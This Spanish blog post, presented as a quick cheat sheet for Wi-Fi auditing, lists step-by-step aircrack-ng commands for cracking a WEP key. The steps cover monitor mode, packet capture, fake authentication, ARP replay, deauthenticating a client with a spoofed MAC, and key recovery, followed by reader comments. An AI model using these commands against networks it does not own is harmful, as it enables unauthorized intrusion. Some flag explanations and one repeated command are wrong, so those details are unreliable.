Tutorial Rapido para Auditoria de Redes Wifi

No es un secreto el método ni las herramientas para recuperar las contraseñas de algún punto de acceso . El presente es un repaso sobre los comandos a ejecutar en una auditoría wireless ya que a pesar de que existen scripts diseñados para facilitar esta tarea eso implica que el conocimiento adquirido sea pobre sin embargo esta guía tampoco explica minuciosamente la forma en que se resuelven los retos en cada auditoría ni lo que implica cada paso. El objetivo de esta entrada es para fines didácticos y más bien como chuleta para recordar la forma manual en que se realiza este proceso. Todos los comentarios relacionados con el uso malintencionado de este tutorial serán eliminados.

Notas:

  • Se da por hecho que tienes los drivers parcheados, listo para la inyección de paquetes.
  • El paquete utilizado es -ng desde los repositorios oficiales.
  • 55:55:55:55:55:55 es el MAC del punto de acceso objetivo.
  • 00:11:22:33:44:55 es el MAC del cliente conectado al punto de acceso objetivo.

Seleccionamos Objetivos

Abrimos una en nuestra distribución favorita y comenzamos:

1. Ponemos en modo monitor a nuestra tarjeta inalámbrica.

sudo airmon-ng start <interfaz> <canal>

2. Comenzamos la captura de paquetes.
sudo airodump-ng --channel <canal> --write <nombre_dearchivo> <interfaz>

O podemos probar con este otro para que busque en un solo punto de acceso.

sudo aireplay-ng -1 0 -e <essid_objetivo> -a 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaz>

Donde la opción –channel sirve para elegir de forma optativa el canal en el cual buscar, la opción –bssid para especificar la MAC de punto de acceso objetivo y –writer para especificar un nombre al archivo donde se guaradarán los paquetes.

Verificando el filtrado MAC

3. Antes de continuar debemos verificar si el punto de acceso realiza filtrado MAC en sus clientes. Usamos este comando:

sudo aireplay-ng -1 0 -e <essid_objetivo> -a 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaz>

Donde:

  • -1 Le dice que NO intente desautentificar clientes.
  • -e Es el nombre de la red objetivo.
  • -a Es la MAC del AP objetivo.
  • -h Es la MAC que tu quieras.

Si el resultado luce así:

03:22:32 Sending Authentication Request
03:22:32 Authentication successful
03:22:32 Sending Association Request
03:22:32 Association successful 🙂

Significa que el filtrado esta apagado y podemos continuar con el tutorial, de otra forma salta a la sección Con Filtrado MAC.

Sin Filtrado MAC

4. Reinyección de paquetes.

sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaZ>

Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.

Con Filtrado MAC

4. Obligamos a desautentificar al cliente que esta en el AP objetivo.

sudo aireplay-ng -0 5 -a 55:55:55:55:55:55 -c 00:11:22:33:44:55 <interface>
Donde:

  • -0 Indica el numero de intentos.
  • -a El MAC del AP objetivo.
  • -c La dirección MAC del cliente.

Para la Re-Inyección se procede de la misma forma solo que ahora nos haremos pasar por el cliente.

sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h 00:11:22:33:44:55 <interfaz>

Como había mencionado… Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.

Obtenemos la clave

Para llegar a este punto necesitas:

a) Con Aircrack-NG

  • Por lo menos 250’000 paquetes para una clave de 64bits
  • Por lo menos 1’500’000 paquetes para una clave de 128bits.

b) Con Aircrack-PTW

  • Alrededor de 20’000 paquetes para una clave de 64bits.
  • Alrededor de 85’000 paquetes para una clave de 128bits.

Para usar Aircrack-NG tecleamos:
sudo aircrack-ng <nombre_dearchivo>.cap
Y para usar Aircrack-PTW tecleamos:

./aircrack-ptw <nombre_dearchivo>.cap

Finalmente conseguimos verificar la fortaleza de nuestra red Inalámbrica.

Comparte con otros

12 pensamientos en “Tutorial Rapido para Auditoria de Redes Wifi”

  1. Buen tuto. Para auditoría de redes a mi me va de lujo el live-cd de wifiway, viene con una gran colección de herramientas y con gran cantidad de controladores para inyección de paquetes.
    Un saludo

    P.D.: Que buena pinta tiene este pan de cada día… dan ganas de meterle un muerdo jeje

  2. hola buenos dias ,soy españolito y tengo 60 años,tu explicacion es muy buena pero yo no me defiendo muy bien en la informatica .
    Vale mi pregunta es la sigiente: que programa es el mejor para esto,supongo que tendre que bajarmelo de alguna pajina de descargas,y dime por favor si hay algun programa mas sencillo aunque sea manos eficaz.
    un saludo de jose.

    1. Buenos día, intentaré ser sincero y a la vez respetuoso.

      No existe una formula mágica (aunque existe wesside-ng) para obtener resultados satisfactorios y sin una pizca de esfuerzo.

      Lo que usted me pide es incluso ofensivo ya que en este blog se tocan temas de Software Libre, significa que no a va encontrar enlaces a sitios ilegales para descargar software.

      Esta guía es para fortalecer la seguridad en su propio router, mejor dicho para aprender y comprender como hacerlo, en este ultimo caso y solo así tendría la posibilidad de aplicarlo en otras áreas, antes no.

      Le sugiero que pagué a alguien para que pueda hacerlo por usted y en un caso ideal por favor adquiera su propia conexión de internet a través de su ISP favorito.

      P.D.: Este comentario a sido redactado para todo el público.

      1. lo mas facil es bajar una distribucion en la que venga wepbuster,audita todas las wep a tu alcance automaticamente.yo lo probe con la distro backtrack4 rc1 y zydas 1211 chipset.
        Esta muy bien para quien no quiera saber,ni aprender.
        me gusta la comodidad pero despues de saber bien como se hace,considero ofensivo lo facil que es.
        cada vez hay mas supervillanos…. pero sin conocimientos xD

  3. Con todos mis respetos,tienes razon pero difiero en:
    El verdadero lammer se cree que es un hacker y alardea a los 4 vientos haber roto una brecha de seguridad con un programa creado para ello sin saber como sucede o bajo que condiciones.
    Y despues estamos los aprendices….
    Porque nadie nace con los conocimientos,con lo cual se aprenden y no todos a la vez.
    todos seriamos o habriamos sido “lammers” el cual va acompañado normalmente con un “de mierda”,
    Y no me mola,creo que no me lo he ganado o me lo gane xD
    Tambien me jode que en los juegos FPS me llamen noob.
    acaso no se paran a pensar que realmente juego 2 horas al mes y que dedico mas tiempo a otras cosas en la red,que a pegar tiros a 4 gilicebollas como ellos y sentirme orgulloso de ello… por ser el nº50 o 200 en un ranking (tristes imbeciles ).

    Bueno era solo un punto de vista sin animo de ofender a nadie,y falto de intencionalidad,quizas sea frustracion de haberlo oido y evitarlo,pero aun asi se te considere porque se confunde com falta de conocimientos y no a una falta de etica ,que es realmente lo que creo que es..
    Chim-punm xD

    1. por cierto….. muy chulo q salga el s.o y el navegador.
      pero desprestigia mi comentario… xD
      Estoy en casa de la chati y con su portatil…
      No me juzgueis por eso… lo siento…
      Es nuevo y no le voy a instalar ninguna distro,hasta que se le pase la garantia.aunque me tienta,esta verde y todavia no esta acostumbrada a hasefroch ni a nada.
      Es el mejor momento para darle la pastilla roja.
      xD
      Un saludo

      1. 1. Estamos igual. Por mi parte no soy un gammer, muchos menos del estilo Shooter.

        2. Confía en cualquier distro. A mi portatil le vole el XP recién la compre, una maravilla. Por ahi anda la entrada en donde lo cuento todo.

  4. Que buen mini-tuto.

    Llevo algunas semanas investigando este tema, y en definitiva no hay WEP infranqueable. Hay otros ataques por supuesto, el chop-chop y fragmentación para obtener y/o construir paquetes ARP para inyectarlos, y bueno se puede decir que si no tiene una tarjeta que inyecte, con unos días que este leyendo paquetes con el airodump, podría tal vez recolectar suficientes IVS o ARPs para sacar la clave (eso sí siempre y cuando sea constante, no va y sea que la clave la cambien preciso).

    La mejor seguridad es WAP2 que por lo pronto es infranqueable, aunque por fuerza bruta se puede sacar (aunque tarde años, siglos, milenios), incluso existe un ataque a WAP tipo chop-chop, aunque parece ser que todavia no esta implementado en el aircrak-ng.

    En fin, hay mucha info al respecto, es un muy buen resumen…

    Salu2

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *